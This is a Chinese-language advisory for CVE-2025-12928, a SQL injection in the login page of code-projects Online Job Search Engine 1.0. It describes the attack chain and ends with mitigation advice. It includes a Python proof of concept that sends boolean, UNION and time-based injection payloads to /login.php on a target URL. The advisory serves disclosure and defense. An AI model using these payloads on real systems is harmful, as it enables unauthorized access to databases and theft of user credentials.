CVE-2025-12928: code-projects在线求职系统1.0登录页SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12928

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Job Search Engine 1.0

漏洞概述

CVE-2025-12928是code-projects在线求职搜索系统1.0版本中的一个高危安全漏洞。该漏洞存在于登录页面(/login.php)中，由于对用户输入的username/phone参数缺乏有效的输入验证和SQL语句预处理，攻击者可以通过构造恶意SQL payloads实现SQL注入攻击。攻击者无需任何认证即可利用此漏洞远程执行恶意SQL代码，成功利用可能导致数据库敏感信息泄露、用户凭据窃取、甚至在某些配置下实现系统命令执行。由于该漏洞已公开利用代码，且攻击复杂度低、影响范围广，对使用该系统的企业构成严重安全威胁。建议立即采取修复措施并加强安全防护。

技术细节

该SQL注入漏洞位于Online Job Search Engine 1.0的登录功能模块中。具体来说，攻击者可以通过HTTP请求向/login.php端点发送精心构造的payload，在username或phone参数中注入SQL语句。由于应用程序未对用户输入进行严格的过滤和参数化查询，恶意SQL代码将被数据库引擎执行。攻击者可利用UNION SELECT、布尔盲注、时间盲注等技术从数据库中提取敏感信息，包括用户密码哈希、管理员凭据、求职者个人信息等。在某些数据库配置下，攻击者还可能通过 INTO OUTFILE 或 xp_cmdshell 等功能实现文件写入或系统命令执行。CVSS 3.1评分7.3(高危)反映了该漏洞的高可利用性和中等影响程度。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Online Job Search Engine 1.0系统，访问/login.php登录页面

STEP 2

步骤2: 漏洞探测

攻击者使用SQL注入测试payload(如单引号、UNION SELECT)探测username/phone参数是否存在SQL注入漏洞

STEP 3

步骤3: 构造恶意payload

根据探测结果，攻击者构造针对性的SQL注入payload，可使用布尔盲注、时间盲注或UNION注入技术

STEP 4

步骤4: 数据提取

通过SQL注入攻击从数据库中提取敏感信息，包括用户表、密码哈希、个人数据等

STEP 5

步骤5: 权限提升/持久化

如获得管理员凭据，攻击者可登录后台管理面板，进一步实施远程代码执行等高危操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12928 SQL Injection PoC
# Target: code-projects Online Job Search Engine 1.0
# Endpoint: /login.php
# Parameter: username or phone

import requests
import sys

def exploit_sqli(target_url, payload):
    """Send SQL injection payload to login page"""
    login_url = f"{target_url}/login.php"
    
    # SQL injection payload for authentication bypass
    data = {
        'username': payload,
        'phone': 'test',
        'password': 'test',
        'submit': 'Login'
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        return response
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

# Boolean-based blind SQL injection payload
payload_boolean = "' OR (SELECT COUNT(*) FROM users) > 0 -- "

# UNION-based injection to extract database version
payload_union = "' UNION SELECT NULL,@@version,NULL,NULL -- "

# Time-based blind SQL injection
payload_time = "' OR IF(1=1,SLEEP(5),0) -- "

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_12928.py <target_url>")
        print("Example: python cve_2025_12928.py http://localhost:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing CVE-2025-12928 on {target}")
    print(f"[*] Target endpoint: {target}/login.php")
    
    # Test with time-based payload
    print("[*] Sending time-based blind SQL injection payload...")
    exploit_sqli(target, payload_time)

影响范围

code-projects Online Job Search Engine 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1)通过Web服务器配置(如Nginx/Apache规则)对/login.php的username/phone参数进行输入过滤，拦截包含SQL关键字的请求；2)禁用错误信息回显，防止攻击者获取数据库结构信息；3)启用数据库审计日志，监控异常SQL查询行为；4)临时关闭登录功能或限制IP访问登录页面；5)部署双因素认证或多因素认证增加认证安全性。